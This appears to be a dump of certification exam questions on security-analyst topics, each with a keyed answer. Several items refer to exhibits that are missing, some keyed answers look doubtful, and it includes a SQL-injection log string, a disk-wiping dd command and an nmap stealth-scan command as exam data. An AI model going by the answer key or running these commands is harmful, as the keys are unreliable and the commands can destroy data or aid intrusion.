A Chief Information Security Officer has asked for a list of hosts that have critical and high-severity findings as referenced in the CVE database. Which
of the following tools would produce the assessment output needed to satisfy this request?

A. Nessus
B. Nikto
C. Fuzzer
D. Wireshark
E. Prowler

Correct Answer: A

QUESTION 132
A team of security analysts has been alerted to potential malware activity. The initial examination indicates one of the affected workstations is beaconing
on TCP port 80 to five IP addresses and attempting to spread across the network over port 445. Which of the following should be the team's NEXT step
during the detection phase of this response process?

A. Escalate the incident to management, who will then engage the network infrastructure team to keep them informed.
B. Depending on system criticality, remove each affected device from the network by disabling wired and wireless connections.
C. Engage the engineering team to block SMB traffic internally and outbound HTTP traffic to the five IP addresses.
D. Identify potentially affected systems by creating a correlation search in the SIEM based on the network traffic.

Correct Answer: D

QUESTION 133
An organization is developing software to match customers' expectations. Before the software goes into production, it must meet the following quality
assurance guidelines:
Uncover all the software vulnerabilities.
Safeguard the interest of the software's end users.
Reduce the likelihood that a defective program will enter production.
Preserve the interests of the software producer.
Which of the following should be performed FIRST?

A. Run source code against the latest OWASP vulnerabilities.
B. Document the life-cycle changes that took place.
C. Ensure verification and validation took place during each phase.
D. Store the source code in a software escrow.
E. Conduct a static analysis of the code.

Correct Answer: E

QUESTION 134
Which of the following APT adversary archetypes represent non-nation-state threat actors? (Choose two.)

A. Kitten
B. Panda
C. Tiger
D. Jackal
E. Bear
F. Spider

Correct Answer: DF

QUESTION 135
A cybersecurity analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of
the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?

A. Implement port security with one MAC address per network port of the switch.
B. Deploy network address protection with DHCP and dynamic VLANs.
C. Configure 802.1X and EAPOL across the network.
D. Implement software-defined networking and security groups for isolation.

Correct Answer: A

QUESTION 136
Which of the following types of controls defines placing an ACL on a file folder?

A. Technical control
B. Confidentiality control
C. Managerial control
D. Operational control

Correct Answer: A

QUESTION 137
Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?

A. Trusted firmware updates provide organizations with development, compilation, remote access, and customization for embedded devices.
B. Trusted firmware updates provide organizations with security specifications, open-source libraries, and custom tools for embedded devices.
C. Trusted firmware updates provide organizations with remote code execution, distribution, maintenance, and extended warranties for embedded
devices.
D. Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.

Correct Answer: D

QUESTION 138
After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated
version of JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent
server compromise and business disruption at the same time?

A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.

Correct Answer: C

QUESTION 139
A company's application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow
industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?

A. Input validation
B. Security regression testing
C. Application fuzzing
D. User acceptance testing
E. Stress testing

Correct Answer: C

QUESTION 140
During the security assessment of a new application, a tester attempts to log in to the application but receives the following message: incorrect
password for given username. Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful
information?

A. Set the web page to redirect to an application support page when a bad password is entered.
B. Disable error messaging for authentication.
C. Recognize that error messaging does not provide confirmation of the correct element of authentication.
D. Avoid using password-based authentication for the application.

Correct Answer: B

QUESTION 141
A security analyst is reviewing the following Internet usage trend report:

Which of the following usernames should the security analyst investigate further?

A. User 1
B. User 2
C. User 3
D. User 4

Correct Answer: B

QUESTION 142
An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from
clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which
of the following should the analyst do to BEST mitigate future attacks?

A. Implement MDM.
B. Update the malware catalog.
C. Patch the mobile device's OS.
D. Block third-party applications.

Correct Answer: A

QUESTION 143
A security analyst at example.com receives a SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream:
Packet capture:

TCP stream:

Which of the following actions should the security analyst take NEXT?

A. Review the known Apache vulnerabilities to determine if a compromise actually occurred.
B. Contact the application owner for connect.example.local for additional information.
C. Mark the alert as a false positive scan coming from an approved source.
D. Raise a request to the firewall team to block 203.0.113.15.

Correct Answer: C

QUESTION 144
A company's domain has been spoofed in numerous phishing campaigns. An analyst needs to determine why the company is a victim of domain
spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC. Upon review of the record, the
analyst finds the following: v=DMARC1; p=none; fo=0; rua=mailto:security@company.com; ruf=mailto:security@company.com; adkim=r; rf=afrf; ri=86400;
Which of the following BEST explains the reason why the company's requirements are not being processed correctly by mailbox providers?

A. The DMARC record's DKIM alignment tag is incorrectly configured.
B. The DMARC record's policy tag is incorrectly configured.
C. The DMARC record does not have an SPF alignment tag.
D. The DMARC record's version tag is set to DMARC1 instead of the current version, which is DMARC3.

Correct Answer: B

QUESTION 145
A company experienced a security compromise due to the inappropriate disposal of one of its hardware appliances. Sensitive information stored on the
hardware appliance was not removed prior to disposal. Which of the following is the BEST manner in which to dispose of the hardware appliance?

A. Ensure the hardware appliance has the ability to encrypt the data before disposing of it.
B. Dispose of all hardware appliances securely, thoroughly, and in compliance with company policies.
C. Return the hardware appliance to the vendor, as the vendor is responsible for disposal.
D. Establish guidelines for the handling of sensitive information.

Correct Answer: B

QUESTION 146
During a review of the vulnerability scan results on a server, an information security analyst notices the following:

The MOST appropriate action for the analyst to recommend to developers is to change the web server so:

A. it only accepts TLSv1.2.
B. it only accepts cipher suites using AES and SHA.
C. it no longer accepts the vulnerable cipher suites.
D. SSL/TLS is offloaded to a WAF and load balancer.

Correct Answer: C

QUESTION 147
A threat hunting team received a new IoC from an ISAC that follows a threat actor's profile and activities. Which of the following should be updated
NEXT?

A. The whitelist
B. The DNS
C. The blocklist
D. The IDS signature

Correct Answer: D

QUESTION 148
A security analyst discovers a standard user has unauthorized access to the command prompt, PowerShell, and other system utilities. Which of the
following is the BEST action for the security analyst to take?

A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.

Correct Answer: A

QUESTION 149
The Chief Information Officer of a large cloud software vendor reports that many employees are falling victim to phishing emails because they appear to
come from other employees. Which of the following would BEST prevent this issue?

A. Include digital signatures on messages originating within the company.
B. Require users to authenticate to the SMTP server.
C. Implement DKIM to perform authentication that will prevent the issue.
D. Set up an email analysis solution that looks for known malicious links within the email.

Correct Answer: C

QUESTION 150
A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?

A. dcfldd if=/dev/one of=/mnt/usb/evidence.bin hash=md5, sha1 hashlog=/mnt/usb/evidence.bin.hashlog
B. dd if=/dev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usb/evidence.bin > /mnt/usb/evidence.bin.hash
C. tar -zcf /mnt/usb/evidence.tar.gz / -except /mnt; sha256sum /mnt/usb/evidence.tar.gz > /mnt/usb/evidence.tar.gz.hash
D. find / -type f -exec cp {} /mnt/usb/evidence/ \; sha1sum /mnt/usb/evidence/* > /mnt/usb/evidence/evidence.hash

Correct Answer: B

QUESTION 151
A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should
be implemented to BEST address these concerns?

A. Data masking
B. Data loss prevention
C. Data minimization
D. Data sovereignty

Correct Answer: A

QUESTION 152
During a forensic investigation, a security analyst reviews some Session Initiation Protocol packets that came from a suspicious IP address. Law
enforcement requires access to a VoIP call that originated from the suspicious IP address. Which of the following should the analyst use to accomplish
this task?

A. Wireshark
B. iptables
C. Tcpdump
D. NetFlow

Correct Answer: A

QUESTION 153
A security team has begun updating the risk management plan, incident response plan, and system security plan to ensure compliance with security
review guidelines. Which of the following can be executed by internal managers to simulate and validate the proposed changes?

A. Internal management review
B. Control assessment
C. Tabletop exercise
D. Peer review

Correct Answer: C

QUESTION 154
A small electronics company decides to use a contractor to assist with the development of a new FPGA-based device. Several of the development
phases will occur off-site at the contractor's labs. Which of the following is the main concern a security analyst should have with this arrangement?

A. Making multiple trips between development sites increases the chance of physical damage to the FPGAs.
B. Moving the FPGAs between development sites will lessen the time that is available for security testing.
C. Development phases occurring at multiple sites may produce change management issues.
D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

Correct Answer: D

QUESTION 155
A security analyst needs to reduce the overall attack surface. Which of the following infrastructure changes should the analyst recommend?

A. Implement a honeypot.
B. Air gap sensitive systems.
C. Increase the network segmentation.
D. Implement a cloud-based architecture.

Correct Answer: C

QUESTION 156
A company's security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the
product is no longer supported, and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the
following would be the BEST method to protect these workstations from threats?

A. Deploy whitelisting to the identified workstations to limit the attack surface.
B. Determine the system process criticality and document it.
C. Isolate the workstations and air gap them when it is feasible.
D. Increase security monitoring on the workstations.

Correct Answer: C

QUESTION 157
A small business does not have enough staff in the accounting department to segregate duties. The comptroller writes the checks for the business and
reconciles them against the ledger. To ensure there is no fraud occurring, the business conducts quarterly reviews in which a different officer in the
business compares all the cleared checks against the ledger. Which of the following BEST describes this type of control?

A. Deterrent
B. Preventive
C. Compensating
D. Detective

Correct Answer: D

QUESTION 158
A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers
are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance, log them,
and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered
from its original configured state?

A. CI/CD
B. Software assurance
C. Anti-tamper
D. Change management

Correct Answer: D

QUESTION 159
During an incident, it is determined that a customer database containing email addresses, first names, and last names was exfiltrated. Which of the
following should the security analyst do NEXT?

A. Consult with the legal department for regulatory impact.
B. Encrypt the database with available tools.
C. Email the customers to inform them of the breach.
D. Follow the incident communications process.

Correct Answer: D

QUESTION 160
As part of the senior leadership team's ongoing risk management activities, the Chief Information Security Officer has tasked a security analyst with
coordinating the right training and testing methodology to respond to new business initiatives or significant changes to existing ones. The management
team wants to examine a new business process that would use existing infrastructure to process and store sensitive data. Which of the following would
be appropriate for the security analyst to coordinate?

A. A black-box penetration testing engagement
B. A tabletop exercise
C. Threat modeling
D. A business impact analysis

Correct Answer: D

QUESTION 161
Which of the following BEST describes how logging and monitoring work when entering into a public cloud relationship with a service provider?

A. Logging and monitoring are not needed in a public cloud environment.
B. Logging and monitoring are done by the data owners.
C. Logging and monitoring duties are specified in the SLA and contract.
D. Logging and monitoring are done by the service provider.

Correct Answer: C

QUESTION 162
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in
confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the
following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?

A. Share details of the security incident with the organization's human resources management team.
B. Note the security incident so other analysts are aware the traffic is malicious.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident to a manager for inclusion in the daily report.

Correct Answer: C

QUESTION 163
An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual
machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the
access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?

A. Sandbox the virtual machine.
B. Implement an MFA solution.
C. Update to the secure hypervisor version.
D. Implement dedicated hardware for each customer.

Correct Answer: C

QUESTION 164
At which of the following phases of the SDLC should security FIRST be involved?

A. Design
B. Maintenance
C. Implementation
D. Analysis
E. Planning
F. Testing

Correct Answer: E

QUESTION 165
During routine monitoring, a security analyst identified the following enterprise network traffic:
Packet capture output:

Which of the following BEST describes what the security analyst observed?

A. 66.187.224.210 set up a DNS hijack with 192.168.12.21.
B. 192.168.12.21 made a TCP connection to 66.187.224.210.
C. 192.168.12.21 made a TCP connection to 209.132.177.50.
D. 209.132.177.50 set up a TCP reset attack to 192.168.12.21.

Correct Answer: C

QUESTION 166
Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution
that will ensure the customers' data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent
the loss of customers' sensitive data?

A. Implement privileged access management.
B. Implement a risk management process.
C. Implement multifactor authentication.
D. Add more security resources to the environment.

Correct Answer: A

QUESTION 167
A cybersecurity analyst needs to harden a server that is currently being used as a web server. The server needs to be accessible when entering
www.company.com into the browser. Additionally, web pages require frequent updates, which are performed by a remote contractor. Given the following
output:

Which of the following should the cybersecurity analyst recommend to harden the server? (Choose two.)

A. Uninstall the DNS service.
B. Perform a vulnerability scan.
C. Change the server's IP to a private IP address.
D. Disable the Telnet service.
E. Block port 80 with the host-based firewall.
F. Change the SSH port to a non-standard port.

Correct Answer: AD

QUESTION 168
A financial organization has offices located globally. Per the organization's policies and procedures, all executives who conduct business overseas must
have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this
process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect
the organization's data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?

A. Implement a mobile device wiping solution for use once the device returns home.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.

Correct Answer: C

QUESTION 169
The majority of a company's employees have stated they are unable to perform their job duties due to outdated workstations, so the company has
decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?

A. A Linux-based system and mandatory training on Linux for all BYOD users
B. A firewalled environment for client devices and a secure VDI for BYOD users
C. A standardized anti-malware platform and a unified operating system vendor
D. 802.1X to enforce company policy on BYOD user hardware

Correct Answer: B

QUESTION 170
A security analyst is correlating, ranking, and enriching raw data into a report that will be interpreted by humans or machines to draw conclusions and
create actionable recommendations. Which of the following steps in the intelligence cycle is the security analyst performing?

A. Analysis and production
B. Processing and exploitation
C. Dissemination and evaluation
D. Data collection
E. Planning and direction

Correct Answer: A

QUESTION 171
Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed
FIRST for this type of evidence acquisition?

A. Extract the hard drives from the compromised machines and then plug them into a forensics machine to apply encryption over the stored data to
protect it from nonauthorized access.
B. Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
C. Perform a disk sanitization using the command #dd if=/dev/zero of=/dev/sdc bs=1M over the media that will receive a copy of the collected data.
D. Execute the command #dd if=/dev/sda of=/dev/sdc bs=512 to clone the evidence data to external media to prevent any further change.

Correct Answer: B

QUESTION 172
An organization needs to limit its exposure to accidental disclosure when employees send emails that contain personal information to recipients outside
the company. Which of the following technical controls would BEST accomplish this goal?

A. DLP
B. Encryption
C. Data masking
D. SPF

Correct Answer: A

QUESTION 173
A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed,
and no additional security controls have been implemented. Which of the following should the analyst review FIRST?

A. The DNS configuration
B. Privileged accounts
C. The IDS rule set
D. The firewall ACL

Correct Answer: C

QUESTION 174
Which of the following is an advantage of SOAR over SIEM?

A. SOAR is much less expensive.
B. SOAR reduces the amount of human intervention required.
C. SOAR can aggregate data from many sources.
D. SOAR uses more robust encryption protocols.

Correct Answer: B

QUESTION 175
A company uses an FTP server to support its critical business functions. The FTP server is configured as follows:
The FTP service is running with the data directory configured in /opt/ftp/data. The FTP server hosts employees' home directories in /home. Employees
may store sensitive information in their home directories. An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of
the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?

A. Implement file-level encryption of sensitive files.
B. Reconfigure the FTP server to support FTPS.
C. Run the FTP server in a chroot environment.
D. Upgrade the FTP server to the latest version.

Correct Answer: C

QUESTION 176
A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that
contain SPI. Prior to the deployment, the analyst should conduct:

A. a tabletop exercise.
B. a business impact analysis.
C. a PCI assessment.
D. an application stress test.

Correct Answer: B

QUESTION 177
A product security analyst has been assigned to evaluate and validate a new product's security capabilities. Part of the evaluation involves reviewing
design changes at specific intervals for security deficiencies, recommending changes, and checking for changes at the next checkpoint. Which of the
following BEST describes the activity being conducted?

A. User acceptance testing
B. Stress testing
C. Code review
D. Security regression testing

Correct Answer: D

QUESTION 178
A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix. Which of the following would the
software developer MOST likely perform to validate the code prior to pushing it to production?

A. Web-application vulnerability scan
B. Static analysis
C. Packet inspection
D. Penetration test

Correct Answer: B

QUESTION 179
A security analyst observes a large amount of scanning activity coming from an IP address outside the organization's environment. Which of the
following should the analyst do to block this activity?

A. Create an IPS rule to block the subnet.
B. Sinkhole the IP address.
C. Create a firewall rule to block the IP address.
D. Close all unnecessary open ports.

Correct Answer: C

QUESTION 180
During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring tool about files
from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?

A. Warn the incident response team that the server can be compromised.
B. Open a ticket informing the development team about the alerts.
C. Check if temporary files are being monitored.
D. Dismiss the alert, as the new application is still being adapted to the environment.

Correct Answer: C

QUESTION 181
A security analyst has received a report that servers are no longer able to connect to the network. After many hours of troubleshooting, the analyst
determines a Group Policy Object is responsible for the network connectivity issues. Which of the following solutions should the security analyst
recommend to prevent an interruption of service in the future?

A. CI/CD pipeline
B. Impact analysis and reporting
C. Appropriate network segmentation
D. Change management process

Correct Answer: D

QUESTION 182
HOTSPOT -
A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed
and if a false positive occurred for each device.

INSTRUCTIONS -
Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a
compliance scan. For ONLY the credentialed and non-credentialed scans, evaluate the results for False Positives and check the Findings that display
false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.
Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results. The Linux Web Server, File-Print Server,
and Directory Server are draggable.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

A.
B.
C.
D.

Correct Answer: A

QUESTION 183
SIMULATION -
Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue.

INSTRUCTIONS -
Click on the ticket to see the ticket details. Additional content is available on tabs within the ticket.
First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from second drop-down menu.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A. Answer: See explanation below.

Issue - High memory utilization
Caused by - wuaucit.exe
Refer to the image below.

B.
C.
D.

Correct Answer: A

QUESTION 184
An organization has the following policies:
Services must run on standard ports.
Unneeded services must be disabled.
The organization has the following servers:
192.168.10.1 - web server
192.168.10.2 - database server
A security analyst runs a scan on the servers and sees the following output:

Which of the following actions should the analyst take?

A. Disable HTTPS on 192.168.10.1.
B. Disable IIS on 192.168.10.1.
C. Disable DNS on 192.168.10.2.
D. Disable MSSQL on 192.168.10.2.
E. Disable SSH on both servers.

Correct Answer: C

QUESTION 185
An analyst performs a routine scan of a host using Nmap and receives the following output:

Which of the following should the analyst investigate FIRST?

A. Port 21
B. Port 22
C. Port 23
D. Port 80

Correct Answer: C

QUESTION 186
A security analyst received a series of antivirus alerts from a workstation segment, and users reported ransomware messages. During lessons-learned
activities, the analyst determines the antivirus was able to alert to abnormal behavior but did not stop this newest variant of ransomware. Which of the
following actions should be taken to BEST mitigate the effects of this type of threat in the future?

A. Enabling sandboxing technology
B. Purchasing cyber insurance
C. Enabling application blacklisting
D. Installing a firewall between the workstations and internet

Correct Answer: A

QUESTION 187
Which of the following will allow different cloud instances to share various types of data with a minimal amount of complexity?

A. Reverse engineering
B. Application log collectors
C. Workflow orchestration
D. API integration
E. Scripting

Correct Answer: D

QUESTION 188
The Chief Information Officer (CIO) of a large healthcare institution is concerned about all machines having direct access to sensitive patient
information. Which of the following should the security analyst implement to BEST mitigate the risk of sensitive data exposure?

A. A cloud access service broker system
B. NAC to ensure minimum standards are met
C. MFA on all workstations
D. Network segmentation

Correct Answer: D

QUESTION 189
A security analyst notices the following entry while reviewing the server logs:
OR 1=1' ADD USER attacker' PW 1337password' --
Which of the following events occurred?

A. CSRF
B. XSS
C. SQLi
D. RCE

Correct Answer: C

QUESTION 190
Due to continued support of legacy applications, an organization's enterprise password complexity rules are inadequate for its required security posture.
Which of the following is the BEST compensating control to help reduce authentication compromises?

A. Smart cards
B. Multifactor authentication
C. Biometrics
D. Increased password-rotation frequency

Correct Answer: B

QUESTION 191
Which of the following BEST explains the function of a managerial control?

A. To help design and implement the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To create data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails

Correct Answer: C

QUESTION 192
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture:

Which of the following generated the above output?

A. A port scan
B. A TLS connection
C. A vulnerability scan
D. A ping sweep

Correct Answer: A

QUESTION 193
Which of the following are considered PII by themselves? (Choose two.)

A. Government ID
B. Job title
C. Employment start date
D. Birth certificate
E. Employer address
F. Mother's maiden name

Correct Answer: AD

QUESTION 194
An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been
compromised. Which of the following should the analyst do FIRST?

A. Perform threat hunting in other areas of the cloud infrastructure.
B. Contact law enforcement to report the incident.
C. Perform a root cause analysis on the container and the service logs.
D. Isolate the container from production using a predefined policy template.

Correct Answer: D

QUESTION 195
Which of the following data security controls would work BEST to prevent real PII from being used in an organization's test cloud environment?

A. Encryption
B. Data loss prevention
C. Data masking
D. Digital rights management
E. Access control

Correct Answer: C

QUESTION 196
SIMULATION -

You are a cybersecurity analyst tasked with interpreting scan data from Company A's servers. You must verify the requirements are being met for all of
the servers and recommend changes if you find they are not.

The company's hardening guidelines indicate the following:

· TLS 1.2 is the only version of TLS running.
· Apache 2.4.18 or greater should be used.
· Only default ports should be used.

INSTRUCTIONS -

Using the supplied data, record the status of compliance with the company's guidelines for each server.

The question contains two parts; make sure you complete Part1 and Part2. Make recommendations for issues based ONLY on the hardening guidelines
provided.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A. Answer: AppServ1 is only using TLS 1.2
AppServ4 is only using TLS 1.2
AppServ1 is using Apache 2.4.18 or greater
AppServ3 is using Apache 2.4.18 or greater
AppServ4 is using Apache 2.4.18 or greater

Recommendation is to disable TLS v1.1 on AppServ2 and AppServ3. Also upgrade AppServ2 Apache to version 2.4.48 from its current version of 2.3.48.
B.
C.
D.

Correct Answer: A

QUESTION 197
A security team wants to make SaaS solutions accessible from only the corporate campus. Which of the following would BEST accomplish this goal?

A. Geotagging
B. IP restrictions
C. Reverse proxy
D. Single sign-on

Correct Answer: C

QUESTION 198
A security analyst receives an alert to expect increased and highly advanced cyberattacks originating from a foreign country that recently had sanctions
implemented. Which of the following describes the type of threat actors that should concern the security analyst?

A. Insider threat
B. Nation-state
C. Hacktivist
D. Organized crime

Correct Answer: B

QUESTION 199
When attempting to do a stealth scan against a system that does not respond to ping, which of the following Nmap commands BEST accomplishes that
goal?

A. nmap -sA -O -noping
B. nmap -sT -O -Pn
C. nmap -sS -O -Pn
D. nmap -sQ -O -Pn

Correct Answer: C

QUESTION 200
A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine. The up-to-date antivirus cannot
detect the malicious executable. Which of the following is the MOST likely cause of this issue?

A. The malware is fileless and exists only in physical memory.
B. The malware detects and prevents its own execution in a virtual environment.
C. The antivirus does not have the malware's signature.
D. The malware is being executed with administrative privileges.

Correct Answer: A

QUESTION 201
A proposed network architecture requires systems to be separated from each other logically based on defined risk levels. Which of the following
explains the reason why an architect would set up the network this way?

A. To complicate the network and frustrate a potential malicious attacker
B. To create a design that simplifies the supporting network
C. To reduce the attack surface of those systems by segmenting the network based on risk
D. To reduce the number of IP addresses that are used on the network

Correct Answer: C

QUESTION 202
An organization has the following risk mitigation policy:

· Risks with a probability of 95% or greater will be addressed before all others regardless of the impact.
· All other prioritization will be based on risk value.

The organization has identified the following risks:

Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B

Correct Answer: B

QUESTION 203
A financial institution's business unit plans to deploy a new technology in a manner that violates existing information security standards. Which of the
following actions should the Chief Information Security Officer (CISO) take to manage any type of violation?

A. Enforce the existing security standards and controls.
B. Perform a risk analysis and qualify the risk with legal.
C. Perform research and propose a better technology.
D. Enforce the standard permits.

Correct Answer: B

QUESTION 204
To validate local system-hardening requirements, which of the following types of vulnerability scans would work BEST to verify the scanned device
meets security policies?

A. SCAP
B. SAST
C. DAST
D. DACS

Correct Answer: A

QUESTION 205
An organization that uses SPF has been notified emails sent via its authorized third-party partner are getting rejected. A security analyst reviews the
DNS entry and sees the following:

The organization's primary mail server IP is 180.10.6.6 and the secondary mail server IP is 180.10.6.5. The organization's third-party mail provider is
"Robust Mail" with the domain name robustmail.com. Which of the following is the MOST likely reason for the rejected emails?

A. SPF version 1 does not support third-party providers.
B. The primary and secondary email server IP addresses are out of sequence.
C. An incorrect IP version is being used.
D. The wrong domain name is in the SPF record.

Correct Answer: D

QUESTION 206
Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services
industry?

A. Real-time and automated firewall rules subscriptions
B. Open-source intelligence, such as social media and blogs
C. Information sharing and analysis membership
D. Common vulnerability and exposure bulletins

Correct Answer: C

QUESTION 207
A host is spamming the network unintentionally. Which of the following control types should be used to address this situation?

A. Managerial
B. Technical
C. Operational
D. Corrective

Correct Answer: D

QUESTION 208
A company has contracted with a software development vendor to design a web portal for customers to access a medical records database. Which of
the following should the security analyst recommend to BEST control the unauthorized disclosure of sensitive data when sharing the development
database with the vendor?

A. Establish an NDA with the vendor.
B. Enable data masking of sensitive data tables in the database.
C. Set all database tables to read only.
D. Use a de-identified data process for the development database.

Correct Answer: B

QUESTION 209
When investigating a compromised system, a security analyst finds the following script in the /tmp directory:

Which of the following attacks is this script attempting, and how can it be mitigated?

A. This is a password-hijacking attack, and it can be mitigated by using strong encryption protocols.
B. This is a password-spraying attack, and it can be mitigated by using multifactor authentication.
C. This is a password-dictionary attack, and it can be mitigated by forcing password changes every 30 days.
D. This is a credential-stuffing attack, and it can be mitigated by using multistep authentication.

Correct Answer: B

QUESTION 210
An organization supports a large number of remote users. Which of the following is the BEST option to protect the data on the remote users' laptops?

A. Require the use of VPNs.
B. Require employees to sign an NDA.
C. Implement a DLP solution.
D. Use whole disk encryption.

Correct Answer: D

QUESTION 211
A company recently experienced financial fraud, which included shared passwords being compromised and improper levels of access being granted.
The company has asked a security analyst to help improve its controls. Which of the following will MOST likely help the security analyst develop better
controls?

A. An evidence summarization
B. An incident response plan
C. A lessons-learned report
D. An indicator of compromise

Correct Answer: C

QUESTION 212
A company uses self-signed certificates when sending emails to recipients within the company. Users are calling the help desk because they are getting
warnings when attempting to open emails sent by internal users. A security analyst checks the certificates and sees the following:

Which of the following should the security analyst conclude?

A. user@company.com is a malicious insider.
B. The valid dates are too far apart and are generating the alerts.
C. certServer has been compromised
D. The root certificate was not installed in the trusted store.

Correct Answer: D

QUESTION 213
A company's security administrator needs to automate several security processes related to testing for the existence of changes within the environment.
Conditionally, other processes will need to be created based on input from prior processes. Which of the following is the BEST method for
accomplishing this task?

A. Machine learning and process monitoring
B. Continuous integration and configuration management
C. API integration and data enrichment
D. Workflow orchestration and scripting

Correct Answer: D

QUESTION 214
A company recently experienced similar network attacks. To determine whether the attacks were identical, the company should gather a list of IPs,
domains, and files and use:

A. behavior data
B. the Diamond Model of Intrusion Analysis.
C. the attack kill chain.
D. the reputational data.

Correct Answer: B

QUESTION 215
A security analyst receives a CVE bulletin, which lists several products that are used in the enterprise. The analyst immediately deploys a critical security
patch. Which of the following BEST describes the reason for the analyst's immediate action?

A. Nation-state hackers are targeting the region.
B. A new vulnerability was discovered by a vendor.
C. A known exploit was discovered.
D. A new zero-day threat needs to be addressed.
E. There is an insider threat.

Correct Answer: C

QUESTION 216
A company recently hired a new SOC provider and implemented new incident response procedures. Which of the following conjoined approaches would
MOST likely be used to evaluate the new implementations for monitoring and incident response at the same time? (Choose two.)

A. Blue-team exercise
B. Disaster recovery exercise
C. Red-team exercise
D. Gray-box penetration test
E. Tabletop exercise
F. Risk assessment

Correct Answer: AE

QUESTION 217
An organization wants to move non-essential services into a cloud computing environment. Management has a cost focus and would like to achieve a
recovery time objective of 12 hours. Which of the following cloud recovery strategies would work BEST to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances.
B. Establish a hot site with active replication to another region within the same cloud provider.
C. Set up a warm disaster recovery site with the same cloud provider in a different region.
D. Configure the systems with a cold site at another cloud provider that can be used for failover.

Correct Answer: C

QUESTION 218
Portions of a legacy application are being refactored to discontinue the use of dynamic SQL. Which of the following would be BEST to implement in the
legacy application?

A. Input validation
B. SQL injection
C. Parameterized queries
D. Web-application firewall
E. Multifactor authentication

Correct Answer: C

QUESTION 219
An international company is implementing a marketing campaign for a new product and needs a security analyst to perform a threat-hunting process to
identify possible threat actors. Which of the following should be the analyst's primary focus?

A. Hacktivists
B. Organized crime
C. Nation-states
D. Insider threats

Correct Answer: B

QUESTION 220
In web application scanning, static analysis refers to scanning:

A. the system for vulnerabilities before installing the application.
B. the compiled code of the application to detect possible issues.
C. an application that is installed and active on a system.
D. an application that is installed on a system that is assigned a static IP.

Correct Answer: B

QUESTION 221
